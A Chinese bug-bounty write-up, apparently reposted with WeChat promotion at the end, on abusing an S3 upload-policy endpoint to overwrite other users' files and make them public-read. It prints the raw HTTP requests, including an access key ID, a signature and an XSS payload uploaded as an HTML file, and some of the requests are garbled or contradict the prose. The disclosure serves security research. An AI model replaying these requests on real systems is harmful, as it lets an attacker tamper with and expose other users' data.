滥用ACL权限覆盖其他用户S3存储桶中的文件/视频

滥用ACL权限覆盖其他用户上传的文件/视频

大家好，今天我要写一篇关于在HackerOne某个项目中最新发现的博客。当时我正在寻找应用程序中的IDOR漏洞，于是开始对应用程序的每个请求进行模糊测试，我发现了以下请求：

POST /api-2.0/s3-upload-signatures HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/home/xxx/test/upload
X-Requested-With: XMLHttpRequest, XMLHttpRequest
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Authorization: Bearer :
X-Example-Authorization: Bearer 
Content-Length: 311
Connection: close
Cookie: {}{"expiration":"2018-12-18T11:58:24.376Z","conditions":[{"acl":"private"},{"bucket":"example-web-upload-bucket"},{"Content-Type":""},{"success_action_status":"200"},{"key":"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg"},{"x-amz-meta-qqfilename":"1.jpg"},["content-length-range","1","9007199254740992"]]}

基本上，这个请求用于设置上传文件到S3存储桶的策略，在这个请求之后，我得到了下面提到的照片/视频上传请求：

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"AKIAIOTLFW3HMG563JEA
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"text/html
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"200
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"public-read
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"1.jpg
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"xxxxxxxxxxxxx{this is policy} 
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:
-----------------------1268156844136880633597812894--

这个请求使用了第一个请求中生成的文件上传策略。我尝试查找应用程序当前使用的S3存储桶中存在的其他文件，一旦我知道了同一存储桶中的一些照片/视频名称，我就尝试创建一个自定义策略来上传不受限制的文件到存储桶，这将覆盖现有文件，而且ACL权限是私有的，我想用public-read替换它，这样应用程序中的每个用户都会受到此攻击的影响。

我尝试通过更改请求中的以下值来创建自定义策略：

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"AKIAIOTLFW3HMG563JEA
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"200
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"private
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"1.jpg
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"xxxxxxxxxxxxx{this is policy}
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:
-----------------------1268156844136880633597812894--

如截图所示，它创建了自定义策略来上传HTML文件，这将覆盖服务器上的现有文件。

我使用策略进行了文件上传请求，请求如下所示：

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"AKIAIOTLFW3HMG563JEA
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"text/html
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"200
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"public-read
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"1.html
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"xxxxxxxxxxxxx{this is policy}
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: text/html<svg/onload=prompt`1`;>
-----------------------1268156844136880633597812894--

现在，这个请求通过覆盖现有文件在存储桶上上传了不受限制的文件，并且通过给文件public-read权限滥用了ACL权限。

就这样：D 感谢大家的阅读，祝大家有美好的一天。
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码